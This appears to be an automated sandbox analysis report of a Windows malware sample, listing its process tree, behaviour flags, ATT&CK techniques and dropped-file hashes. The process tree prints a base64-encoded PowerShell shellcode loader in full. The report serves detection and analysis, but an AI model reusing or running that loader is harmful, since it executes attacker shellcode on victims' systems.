ACQASwBnAGEAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQASwBnAGEAIAAkAFAAQgBVAHoAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUABCAFUAegAgACQAZQAiADsAfQA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1472
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABvAFYAcQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AVgBxACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAYgAsADAAeABjAGQALAAwAHgANABmACwAMAB4ADYAOAAsADAAeABlADYALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAOQA1ACwAMAB4ADUAYwAsADAAeAA4AGEALAAwAHgAMQAzACwAMAB4AGQAOQAsADAAeAA4AGIALAAwAHgAYwA1ACwAMAB4AGQAYwAsADAAeAAyADEALAAwAHgANABjACwAMAB4AGIAYQAsADAAeAA1ADUALAAwAHgAYwA0ACwAMAB4ADcAZAAsADAAeABlADgALAAwAHgAMAAyACwAMAB4ADgAZAAsADAAeAAyAGMALAAwAHgAMwBjACwAMAB4ADQAMAAsADAAeABjADMALAAwAHgAZABjACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgAZgA3ACwAMAB4AGQAMwAsADAAeAA3ADAALAAwAHgAZQAyACwAMAB4AGQAMQAsADAAeAA2ADAALAAwAHgAMABjACwAMAB4AGQAYgAsADAAeAAyAGMALAAwAHgAOAA4ACwAMAB4AGMAMAAsADAAeABkAGIALAAwAHgAZQAyACwAMAB4ADQAYQAsADAAeAA0ADIALAAwAHgAYQAwACwAMAB4AGYAOAAsADAAeAA5AGUALAAwAHgAYQA0ACwAMAB4ADkAOQAsADAAeAAzADMALAAwAHgAZAAzACwAMAB4AGEANQAsADAAeABkAGUALAAwAHgAOAAyACwAMAB4ADkAOQAsADAAeAA0AGEALAAwAHgAYgAyACwAMAB4ADQAMwAsADAAeABlADkALAAwAHgAYwA3ACwAMAB4ADIAMwAsADAAeABlADAALAAwAHgAYQBmACwAMAB4AGQAYgAsADAAeAA0ADIALAAwAHgAMgA2ACwAMAB4AGEANAAsADAAeAA2ADQALAAwAHgAMwBkACwAMAB4ADQAMwAsADAAeAA3AGIALAAwAHgAMQAwACwAMAB4AGYAMQAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADgAOQAsADAAeAA4ADIALAAwAHgAMQA0ACwAMAB4ADYAYwAsADAAeAAyAGIALAAwAHgANAA2ACwAMAB4ADIAZgAsADAAeAAyADQALAAwAHgAMwAzACwAMAB4AGUAZAAsADAAeABlADYALAAwAHgAYwAxACwAMAB4ADcAZgAsADAAeABkAGMALAAwAHgAMAA3ACwAMAB4ADYAMAAsADAAeAAwAGIALAAwAHgAMgBhACwAMAB4ADcAYwAsADAAeAA3ADIALAAwAHgAZABkACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAZAA5ACwAMAB4ADIAMAAsADAAeAA0AGIALAAwAHgANABmACwAMAB4ADIAMwAsADAAeAA2ADQALAAwAHgANgBjACwAMAB4AGEAZgAsADAAeAA1ADYALAAwAHgAOQBlACwAMAB4ADgAZQAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADYANQAsADAAeABlAGMALAAwAHgAOAA4ACwAMAB4AGUANAAsADAAeAA3AGEALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAA1AGUALAAwAHgANQBmACwAMAB4ADYANgAsADAAeAA4ADgALAAwAHgAMwA5ACwAMAB4ADEANAAsADAAeAA2ADQALAAwAHgANgA1ACwAMAB4ADQAZAAsADAAeAA3ADIALAAwAHgANgA5ACwAMAB4ADcAOAAsADAAeAA4ADIALAAwAHgAMAA4ACwAMAB4ADkANQAsADAAeABmADEALAAwAHgAMgA1ACwAMAB4AGQAZgAsADAAeAAxAGYALAAwAHgANAAxACwAMAB4ADAAMgAsADAAeABmAGIALAAwAHgANAA0ACwAMAB4ADEAMgAsADAAeAAyAGIALAAwAHgANQBhACwAMAB4ADIAMQAsADAAeABmADUALAAwAHgANQA0ACwAMAB4AGIAYwAsADAAeAA4AGQALAAwAHgAYQBhACwAMAB4AGYAMAAsADAAeABiADYALAAwAHgAMwBjACwAMAB4AGIAZAAsADAAeAA4ADUALAAwAHgAMwA2ACwAMAB4AGIAZgAsADAAeABjADIALAAwAHgAZABiACwAMAB4AGEAMAAsADAAeAA3ADMALAAwAHgAMABlACwAMAB4AGUANAAsADAAeAAzADAALAAwAHgAMQBjACwAMAB4ADEAOQAsADAAeAA5ADcALAAwAHgAMAAyACwAMAB4ADgAMwAsADAAeABiADEALAAwAHgAMwBmACwAMAB4ADIAZgAsADAAeAA0AGMALAAwAHgAMQBmACwAMAB4AGMANwAsADAAeAAyADYALAAwAHgANQBhACwAMAB4AGEAMAAsADAAeAAxADcALAAwAHgAOAAwACwAMAB4ADAAYgAsADAAeAA1AGYALAAwAHgAOQA4ACwAMAB4AGYAMQAsADAAeAAwADIALAAwAHgAOQBiACwAMAB4AGMAYwAsADAAeABhADEALAAwAHgAMwBjACwAMAB4ADAAYQAsADAAeAA2AGQALAAwAHgAMgBhACwAMAB4AGIAZAAsADAAeABiADMALAAwAHgAYgA4ACwAMAB4AGMANwAsADAAeABiADcALAAwAHgAMgAzACwAMAB4ADUAMQAsADAAeAA4ADYALAAwAHgAZgAyACwAMAB4ADcAZQAsADAAeAAzAGQALAAwAHgAYgA0ACwAMAB4ADAAMgAsADAAeABjADYALAAwAHgAOABiACwAMAB4ADMAMQAsADAAeABlADQALAAwAHgAOQA2ACwAMAB4AGEAMwAsADAAeAAxADEALAAwAHgAYgA5ACwAMAB4ADUANgAsADAAeAAxADQALAAwAHgAZAAyACwAMAB4ADYAOQAsADAAeAAzAGUALAAwAHgANwBlACwAMAB4AGQAZAAsADAAeAA1ADYALAAwAHgANQBlACwAMAB4ADgAMQAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4AGYANAAsADAAeAA2AGUALAAwAHgAZQBlACwAMAB4ADUANwAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGEAYgAsADAAeAAyAGMALAAwAHgAMQAxACwAMAB4AGQANwAsADAAeAA2ADEALAAwAHgANAA5ACwAMAB4ADEAMQAsADAAeAA1ADMALAAwAHgAOAA2ACwAMAB4AGEAZAAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGUAMwAsADAAeABiAGQALAAwAHgAYgA3ACwAMAB4ADUANAAsADAAeABiAGUALAAwAHgAOQBjACwAMAB4ADEAMQAsADAAeAA2AGEALAAwAHgAMQA0ACwAMAB4ADgAYQAsADAAeAA5AGQALAAwAHgAZgBlACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAYwBhACwAMAB4ADkANgAsADAAeAA5ADkALAAwAHgANwA4ACwAMAB4ADMAYwAsADAAeAAzADkALAAwAHgANgAxACwAMAB4AGEAZgAsADAAeAAzADcALAAwAHgAZgAwACwAMAB4AGYANwAsADAAeAAxADAALAAwAHgAMgBmACwAMAB4AGYAZAAsADAAeAAxADcALAAwAHgAOQAxACwAMAB4AGEAZgAsADAAeABhAGIALAAwAHgANwBkACwAMAB4ADkAMQAsADAAeABjADcALAAwAHgAMABiACwAMAB4ADIANgAsADAAeABjADIALAAwAHgAZgAyACwAMAB4ADUAMwAsADAAeABmADMALAAwAHgANwA2ACwAMAB4AGEAZgAsADAAeABjADEALAAwAHgAZgBjACwAMAB4ADIAZQAsADAAeAAxAGMALAAwAHgANAAxACwAMAB4ADkANQAsADAAeABjAGMALAAwAHgANwBiACwAMAB4AGEANQAsADAAeAAzAGEALAAwAHgAMgBlACwAMAB4AGEAZQAsADAAeAAzADcALAAwAHgAMAA2ACwAMAB4AGYAOQAsADAAeAA5ADYALAAwAHgANABkACwAMAB4ADYANgAsADAAeAAzADkAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAE0AegBHAEEAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAE0AegBHAEEALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAE0AegBHAEEALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2988
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6eyhixm.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2772
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2D1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE2C1.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE2D1.tmp

Filesize
1KB

MD5
60d3a883875506683f66b273eabcd1e6

SHA1
f54623242612fb942ca9ec15fbce964504a61059

SHA256
e2ea280e37a3bba0f6a75b8cc37940952db860f13220c680f84bb193115c2854

SHA512
4aee529bde24e7f9ccf7447063cc6f2d4b72b0b3bcddca2d6fbb4ac7a6eb5f8647a91a17ad51e28bac5e4b9ef41f0ef828e18aebc3353db9a230b826ce886cee

Download Submit
C:\Users\Admin\AppData\Local\Temp\l6eyhixm.dll

Filesize
3KB

MD5
a34a29fc12ece1742ecb44301c1a5132

SHA1
0fbbaac7a226840ad942d66b9def21f889f6999f

SHA256
d3ac29e59cddc5f714fc23597f90212c68c2a67b9c10e9eb92779f2a3b3f23e2

SHA512
bf968e88c53fdbf1306bf977c470d9da40b517de2c749e1f129d666d33de43057c1dbb0cc8c0d09d58e76223285389ac373846b562024ee0e92d62d1e9e9d4fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\l6eyhixm.pdb

Filesize
7KB

MD5
183efb95cad19fa7fa5254a730f5cdb6

SHA1
dcb5b629397e89f15dcf91c5b0d0545a0988f19a

SHA256
355d994379f763eccfb7303fe477296d7802b57a03cbf7738d7bbe51004e26c0

SHA512
8bcb6838817b7c02c11a6222a67289c58f0d08768d376195ebeea73d04860a2bb8c4c5785e747d7f23871ddf5b2c746c3ce3362218d0d22df08a048497f8c0fc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
51a2d8bd1ea32db9b7b301aaf497729e

SHA1
e3fc78cf1cc0224471a4fba3ccfb1993422c81ff

SHA256
46a0c658094c98d5bf467341f0630acdbeff51f95a90109dca6be1f68a836bf5

SHA512
fc00ea734704568c394a7571069893c224a7bd98c96c1be85192567045f8136b9acd4a83c219f92a363def8dce42955ba8b341cf7d7ab629bb2d3bff00df9bfe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE2C1.tmp

Filesize
652B

MD5
a7cb0a00252e59ff697190beba8fb89c

SHA1
64538b0715889ed5268943c1e8fc01d201aa536c

SHA256
ebee38c89cec9c165e34d7efff9a2232cf1f01363623ed000ae69cf7defa472c

SHA512
972db40e742709d8f6d8c913cbb48646ea64909102ab39689c071f9a66fb249ed196e3af5348bf7812f723aa24493a2a5f8f993f64bb409ceb70ae614551861d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l6eyhixm.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l6eyhixm.cmdline

Filesize
309B

MD5
822e77fec134ead6344597839ad594f5

SHA1
5eb641fc94afcc02dc99bba58bffc51e1e95edf3

SHA256
f5957db6c106ef1271b68057c81ce402a61c2b78c562a44f142fbbe47c1e8963

SHA512
7d8f12486a63263eae58c76b2cf8643d6f294faeb3b3f904e2e740a8ff69b5ab1e02d1a5b25a83513eba50d60718fd2226495970f0330f760bd51a394711f343

Download Submit
memory/1928-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1928-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/1928-9-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1928-4-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

Filesize
4KB

Download
memory/1928-6-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/1928-8-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1928-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1928-45-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/1928-41-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

Filesize
4KB

Download
memory/1928-40-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2380-42-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2380-44-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2380-16-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2988-39-0x00000000029C0000-0x00000000029C1000-memory.dmp

Filesize
4KB

Download
memory/2988-43-0x00000000029C0000-0x00000000029C1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads